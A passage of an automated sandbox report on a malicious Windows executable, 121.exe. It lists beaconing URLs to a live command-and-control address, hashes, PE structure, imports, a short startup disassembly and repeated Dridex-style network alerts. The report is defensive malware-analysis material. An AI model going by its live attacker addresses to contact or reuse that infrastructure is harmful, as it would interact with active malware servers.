https://152.42.226.16:60421/caTd | 121.exe, 00000000.00000003.3210323568.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3241004912.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cab | 121.exe, 00000000.00000002.4495724989.00000000000E7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/cavd | 121.exe, 00000000.00000003.4249526901.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3389400003.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3417364243.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3419421492.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3360034969.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3358305653.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/caX | 121.exe, 00000000.00000003.4072645930.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://152.42.226.16:60421/caJda | 121.exe, 00000000.00000003.4190918954.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3181156239.000000000011B000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3179225688.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:%u/ | 121.exe, 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/226.16:60421/ | 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2274708587.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2185358392.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3031853030.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3120178982.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2272990691.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2913297438.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215047117.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/caEdh | 121.exe, 00000000.00000003.3951714993.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/caIdd | 121.exe, 00000000.00000003.4307921187.000000000011B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16/ | 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://152.42.226.16:60421/caOdb | 121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
152.42.226.16 | unknown | United States | 81 | NCRENUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581040
Start date and time: 2024-12-26 19:27:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 121.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 15
• Number of non-executed functions: 162
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• VT rate limit hit for: 121.exe
Time | Type | Description
13:27:58 | API Interceptor | 13872838x Sleep call for process: 121.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
152.42.226.16 | 7W3KSFhWbw.elf | malicious | Unknown |
152.42.226.16 | 3K6iey8Gan.elf | malicious | Unknown |
152.42.226.16 | yA6XZfl1zU.elf | malicious | Unknown |
                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NCRENUS | xd.sh4.elf | malicious | Mirai | 152.50.51.184
NCRENUS | xd.mpsl.elf | malicious | Mirai | 204.87.8.87
NCRENUS | telnet.ppc.elf | malicious | Unknown | 152.36.142.178
NCRENUS | loligang.arm7.elf | malicious | Mirai | 152.12.73.251
NCRENUS | nklmpsl.elf | malicious | Unknown | 152.28.215.100
NCRENUS | arm.nn.elf | malicious | Mirai, Okiru | 152.9.28.133
NCRENUS | arm5.nn.elf | malicious | Mirai, Okiru | 198.86.164.26
NCRENUS | spc.elf | malicious | Mirai, Moobot | 152.45.109.36
NCRENUS | star.ppc.elf | malicious | Mirai, Moobot | 152.10.107.176
NCRENUS | https://shibe-rium.net/ | malicious | Unknown | 152.42.156.84
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Entropy (8bit):7.2998021988289725
                      TrID:
                      • Win64 Executable (generic) (12005/4) 74.80%
                      • Generic Win/DOS Executable (2004/3) 12.49%
                      • DOS Executable Generic (2002/1) 12.47%
                      • VXD Driver (31/22) 0.19%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                      File name:121.exe
                      File size:328'704 bytes
                      MD5:3b8f4ae6dd1ef9625f8ba8f6c9eb8515
                      SHA1:d3dbc4f0348dce6c99dba536f8e86deb707be6ab
                      SHA256:f3ea334bb3adf2fabae612dd6155d15a05e5e1998a1d9d7b326e42ac4291c57e
                      SHA512:96deb5213595a0fecebb6cbf27ae709d71a3615ee898d90d63092530f1087830274e70b8ad55ba5ffade537c04604c9fa60696c01307bc9f4e77743fd7cc54b2
                      SSDEEP:6144:ron77DDqry02A5s5pGqV8t+b3ewQTT9oe+rpHmGG/RX5NfCF3h2Gkk2l:0DGrL2A5OxO9oe+rFGzNK3h9
                      TLSH:33649EE4B1BA68DBCFED433880D6C69C71255AD1D4263C7732B57B28ACDDD36080AD62
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......cD........ ............................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x4014c0
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                      TLS Callbacks:0x401ba0
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:147442e63270e287ed57d33257638324
                      Instruction
                      dec eax
                      sub esp, 28h
                      dec eax
                      mov eax, dword ptr [0004EFF5h]
                      mov dword ptr [eax], 00000001h
                      call 00007F7AE8B389BFh
                      call 00007F7AE8B381AAh
                      nop
                      nop
                      dec eax
                      add esp, 28h
                      ret
                      nop word ptr [eax+eax+00000000h]
                      nop dword ptr [eax]
                      dec eax
                      sub esp, 28h
                      dec eax
                      mov eax, dword ptr [0004EFC5h]
                      mov dword ptr [eax], 00000000h
                      call 00007F7AE8B3898Fh
                      call 00007F7AE8B3817Ah
                      nop
                      nop
                      dec eax
                      add esp, 28h
                      ret
                      nop word ptr [eax+eax+00000000h]
                      nop dword ptr [eax]
                      dec eax
                      sub esp, 28h
                      call 00007F7AE8B39E54h
                      dec eax
                      test eax, eax
                      sete al
                      movzx eax, al
                      neg eax
                      dec eax
                      add esp, 28h
                      ret
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      dec eax
                      lea ecx, dword ptr [00000009h]
                      jmp 00007F7AE8B384D9h
                      nop dword ptr [eax+00h]
                      ret
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      dec eax
                      jmp ecx
                      dec eax
                      arpl word ptr [00002AC2h], ax
                      test eax, eax
                      jle 00007F7AE8B38528h
                      cmp dword ptr [00002ABBh], 00000000h
                      jle 00007F7AE8B3851Fh
                      dec eax
                      mov edx, dword ptr [00052CFEh]
                      dec eax
                      mov dword ptr [ecx+eax], edx
                      dec eax
                      mov edx, dword ptr [00052CFBh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54000 | 0x8d8 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x51000 | 0x2b8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x50060 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x54224 | 0x1e8 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x20a8 | 0x2200 | ba98beafce4128c14539a20f3e854b25 | False | 0.5734145220588235 | data | 6.010394259460846 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x4000 | 0x4bcf0 | 0x4be00 | cf292f62555c0cdae19dae4fa133a740 | False | 0.6267150175041186 | data | 7.30160607800781 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x50000 | 0x910 | 0xa00 | 5fcc7830b4dcd602b35eeb7f1712e8fa | False | 0.241796875 | data | 4.459688665734325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0x51000 | 0x2b8 | 0x400 | f88aef14dea168f37249daf0dce04c78 | False | 0.37890625 | data | 3.2311971178670404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0x52000 | 0x238 | 0x400 | 6ce9e303fb86766d702ecb2b174cf348 | False | 0.2578125 | data | 2.6337753778508075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x53000 | 0x9d0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x8d8 | 0xa00 | 3aae8d98b4d34bad008e73a14573bffd | False | 0.323828125 | data | 3.966749721413537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x55000 | 0x68 | 0x200 | 52d79e9aecf5d5c3145d3ec54aa197a8 | False | 0.0703125 | data | 0.2709192282599745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x56000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
KERNEL32.dll | CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T19:28:01.673606+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49704 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:07.561196+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49707 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:13.409204+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49710 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:19.377507+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49715 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:25.256835+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49727 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:31.327154+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49744 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:37.157879+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49758 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:43.783419+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49775 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:49.678477+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49789 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:55.588585+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49802 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:01.456300+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49821 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:07.535213+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49833 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:14.096183+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49850 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:19.931428+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49864 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:26.206541+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49877 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:32.159250+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49894 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:38.062491+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49908 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:44.081306+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49926 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:49.995684+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49942 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:55.909580+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49957 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:01.910442+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49974 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:07.860082+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49988 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:13.817298+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50005 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:19.803151+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50019 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:25.829058+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50035 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:31.881327+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50049 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:37.723474+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50054 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:43.582932+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50057 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:49.464020+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50060 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:55.445758+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50063 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:01.288625+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50066 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:07.098896+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50069 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:13.399828+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50072 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:19.241638+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50075 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:25.037680+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50078 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:30.865630+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50081 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:36.927590+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50084 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:42.740586+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50087 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:48.599640+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50090 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:54.641776+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50093 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:32:00.493646+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50096 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:32:06.302485+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 50099 | 152.42.226.16 | 60421 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Dec 26, 2024 19:28:40.549736977 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:40.549820900 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.095874071 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:41.095971107 CET4977060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.096677065 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:41.096770048 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.097204924 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:41.215616941 CET6042149770152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:41.216926098 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.783345938 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.783418894 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.783516884 CET4977560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.794596910 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.904283047 CET6042149775152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.915191889 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:43.915282965 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:43.915533066 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:44.034998894 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.657814980 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.657898903 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.657980919 CET4978260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.670279980 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.778021097 CET6042149782152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.790309906 CET6042149788152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:46.790397882 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.790539026 CET4978860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:46.901603937 CET4978960421192.168.2.5152.42.226.16
